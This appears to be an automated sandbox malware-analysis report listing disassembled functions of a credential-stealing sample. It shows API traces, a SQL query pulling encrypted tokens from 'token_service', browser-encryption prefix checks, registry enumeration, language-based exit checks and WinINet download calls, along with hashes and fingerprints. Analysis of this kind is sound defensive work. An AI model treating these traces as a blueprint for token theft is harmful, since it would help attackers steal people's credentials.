Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrlenA.KERNEL32(00000000), ref: 0040BC9F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
lstrlenA.KERNEL32(00000000), ref: 0040BDA5
lstrlenA.KERNEL32(00000000), ref: 0040BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040BBEB
AccountTokens, xrefs: 0040BB49
AccountId, xrefs: 0040BCC4
AccountTokens, xrefs: 0040BABA

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA

Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
ExitProcess.KERNEL32 ref: 004167A5
ExitProcess.KERNEL32 ref: 004167AF
ExitProcess.KERNEL32 ref: 004167B9
ExitProcess.KERNEL32 ref: 004167C3
ExitProcess.KERNEL32 ref: 004167CD

Strings

B, xrefs: 00416780, 0041678C

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: B
API String ID: 1494266314-2248957098
Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96

Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
memset.MSVCRT ref: 00409EE8
LocalAlloc.KERNEL32(00000040,?), ref: 00409F41

Strings

v10, xrefs: 00409EA3
ERROR_RUN_EXTRACTOR, xrefs: 00409E67
@, xrefs: 00409EF1
v20, xrefs: 00409E21

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1977917189-1096346117
Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A

Function 00817837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00817537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008175A1
Part of subcall function 00817537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817618
Part of subcall function 00817537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00817674
Part of subcall function 00817537: GetProcessHeap.KERNEL32(00000000,?), ref: 008176B9
Part of subcall function 00817537: HeapFree.KERNEL32(00000000), ref: 008176C0

lstrcat.KERNEL32(0064A668,004217FC), ref: 0081786D
lstrcat.KERNEL32(0064A668,00000000), ref: 008178AF
lstrcat.KERNEL32(0064A668,00421800), ref: 008178C1
lstrcat.KERNEL32(0064A668,00000000), ref: 008178F6
lstrcat.KERNEL32(0064A668,00421804), ref: 00817907
lstrcat.KERNEL32(0064A668,00000000), ref: 0081793A
lstrcat.KERNEL32(0064A668,00421808), ref: 00817954
task.LIBCPMTD ref: 00817962

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID:
API String ID: 2677904052-0
Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
Instruction ID: 7fabf4525de7dc01449866ef00854a149962893a865a2cd0316d39671537615c
Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
Instruction Fuzzy Hash: D2315C79A40109EFDB08FBE4DC96DFE777AFF45301B145118E112E72A0DA34A986CB62

Function 00815217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00815231
RtlAllocateHeap.NTDLL(00000000), ref: 00815238
InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00815251
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00815278
InternetReadFile.WININET(?,?,00000400,00000000), ref: 008152A8
memcpy.MSVCRT(00000000,?,00000001), ref: 008152F1
InternetCloseHandle.WININET(?), ref: 00815320
InternetCloseHandle.WININET(?), ref: 0081532D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
Instruction ID: 592b5c42f01f4edccddad632daf043b7fc54b01662f04dd25649016240fda6f0
Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
Instruction Fuzzy Hash: 553107B8A40218EBDB20CF94DC85BDCB7B5FF48704F1081D9E609A7281D7706AC58F59

Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
HeapAlloc.KERNEL32(00000000), ref: 00404FD1
InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
InternetCloseHandle.WININET(00415EDB), ref: 004050B9
InternetCloseHandle.WININET(?), ref: 004050C6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID:
API String ID: 3894370878-0
Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99

Function 00825777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 008258AB
StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00825908
StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00825ABE

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00825457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0082548F

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00825527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0082557F
Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 00825596
Part of subcall function 00825527: StrStrA.SHLWAPI(00000000,00000000), ref: 008255CB
Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 008255EA
Part of subcall function 00825527: strtok.MSVCRT(00000000,?), ref: 00825605
Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 00825615

StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 008259F2
StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00825BA7
StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00825C73
Sleep.KERNEL32(0000EA60), ref: 00825C82

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID:
API String ID: 3630751533-0
Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
Instruction ID: 9b1d74a87e3b7b8b5a0511ff9449d3d29049d4cf9629f58466813b4dd2665bcd
Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
Instruction Fuzzy Hash: A2E13D71950628ABCB18FBA8FD969EE7379FF55300F408128B506E6191EF345B88CB53

Function 00811577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081158E

Part of subcall function 00811507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081151B
Part of subcall function 00811507: RtlAllocateHeap.NTDLL(00000000), ref: 00811522
Part of subcall function 00811507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0081153E
Part of subcall function 00811507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0081155C
Part of subcall function 00811507: RegCloseKey.ADVAPI32(?), ref: 00811566

lstrcat.KERNEL32(?,00000000), ref: 008115B6
lstrlen.KERNEL32(?), ref: 008115C3
lstrcat.KERNEL32(?,004262E4), ref: 008115DE

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

CopyFileA.KERNEL32(?,00000000,00000001), ref: 008116CC

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01

DeleteFileA.KERNEL32(00000000), ref: 00811756
memset.MSVCRT ref: 0081177D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID:
API String ID: 3885987321-0
Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
Instruction ID: 97398b8d7a2193e0beedcbaa30b93d15825d0e0ef9f872da676e3dc606e21b76
Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
Instruction Fuzzy Hash: 335124719502289BCB19FB64ED96AED737CFF54700F4041A8B60AA2082EE305BC9CF57

Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
RegCloseKey.ADVAPI32(00000000), ref: 0041848C
RegCloseKey.ADVAPI32(00000000), ref: 00418499

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

RegQueryValueExA.ADVAPI32(00000000,008C9370,00000000,000F003F,?,00000400), ref: 004184EC
lstrlenA.KERNEL32(?), ref: 00418501
RegQueryValueExA.ADVAPI32(00000000,008C92C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
RegCloseKey.ADVAPI32(00000000), ref: 00418608
RegCloseKey.ADVAPI32(00000000), ref: 0041861A

Strings

%s\%s, xrefs: 0041844D

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4

Function 00814A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0

Strings

<, xrefs: 00814A30

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
Instruction ID: 3d6f2a9fd30731bb1a093da9ffce2544070fb81aa0d39c7f7b32c1a11b1848ca
Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
Instruction Fuzzy Hash: 6D213EB5D00219ABDF14DFA8E849ADD7B74FF44321F108225F915A7290EB706A05CF92

Function 008278F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082790B
RtlAllocateHeap.NTDLL(00000000), ref: 00827912
RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00827944
RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00827965
RegCloseKey.ADVAPI32(00000000), ref: 0082796F

Strings

Windows 11, xrefs: 00827924

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction ID: 7376b08ddaa1a084dde38f75b6035805d404ce1da033a0249ed0f43eb594ac65
Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction Fuzzy Hash: 3E017CB9A80308BBEB00DBE5EC49FADBBB9EB08700F004155BA05D6280D67499808B51

Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
HeapAlloc.KERNEL32(00000000), ref: 004176AB
RegOpenKeyExA.ADVAPI32(80000002,00895EC8,00000000,00020119,00000000), ref: 004176DD
RegQueryValueExA.ADVAPI32(00000000,008C9010,00000000,00000000,?,000000FF), ref: 004176FE
RegCloseKey.ADVAPI32(00000000), ref: 00417708

Strings

Windows 11, xrefs: 004176BD

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55

Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
HeapAlloc.KERNEL32(00000000), ref: 0041773B
RegOpenKeyExA.ADVAPI32(80000002,00895EC8,00000000,00020119,004176B9), ref: 0041775B
RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
RegCloseKey.ADVAPI32(004176B9), ref: 00417784

Strings

CurrentBuildNumber, xrefs: 00417771

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51

Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
CloseHandle.KERNEL32(000000FF), ref: 00419327

Strings

:A, xrefs: 00419311, 0041933D, 00419314
:A, xrefs: 004192F8, 004192FB

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :A$:A
API String ID: 1378416451-1974578005
Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45

Function 00817537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008175A1
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817618
StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00817674
GetProcessHeap.KERNEL32(00000000,?), ref: 008176B9
HeapFree.KERNEL32(00000000), ref: 008176C0

Part of subcall function 008194A7: vsprintf_s.MSVCRT ref: 008194C2

task.LIBCPMTD ref: 008177BC

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
String ID:
API String ID: 700816787-0
Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
Instruction ID: 239911f163dd521b751c10b0e479f958c1db52037426d860903156d9d133cc7c
Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
Instruction Fuzzy Hash: C76138B59042689BDB24DB54CC45FE9B7BCFF48300F0085E9E689A6281DBB06BC5CF95

